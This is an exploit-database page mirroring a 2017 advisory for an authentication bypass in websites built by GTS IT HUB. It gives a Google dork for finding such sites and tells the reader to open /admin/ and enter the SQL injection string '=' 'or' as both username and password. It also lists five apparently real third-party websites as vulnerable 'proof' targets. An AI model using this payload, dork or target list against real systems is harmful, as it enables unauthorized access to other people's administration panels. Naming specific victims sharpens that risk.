Advertisement






GTS IT HUB Bypass Admin Page Vulnerability

CVE Category Price Severity
N/A CWE-306 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2017-01-20
CVSS EPSS EPSSP
CVSS:4.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017010161

Below is a copy:

GTS IT HUB Bypass Admin Page Vulnerability|=============================================================|
|-------------------In The Name Of God------------------------| 
|
|  Exploit Title: GTS IT HUB Bypass Admin Page Vulnerability
|
|  Exploit Author: Ashiyane Digital Security Team 
|
|  Vendor Homepage: http://www.gtsithub.com/
|
|  Google Dork : intext:"Design & Developed by GTS IT HUB" 
|
|  Tested on: Windows 10 ~~~> Mozilla Firefox
|
|  Date: 1/19/2017
|==========================================================|
|  Then Choose a Target and put this after URL : /admin/
|=========|
|  And fill username and password like the information below :
|  Username : '=' 'or'
|  Password : '=' 'or'
| ==========================================================|
|  Proof :
|
|  http://www.zeconmetal.com/admin/  
|
|  http://bookdharamshala.com/admin/
|
|  http://touchwoodcloud9.com/admin/  
|
|  http://www.touchwoodconsultancy.in/admin/
|
|  http://mothersworldenglishschool.com/admin/
|
|=============================================================|
|  Discovered By : HackFans
|=============================================================|

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.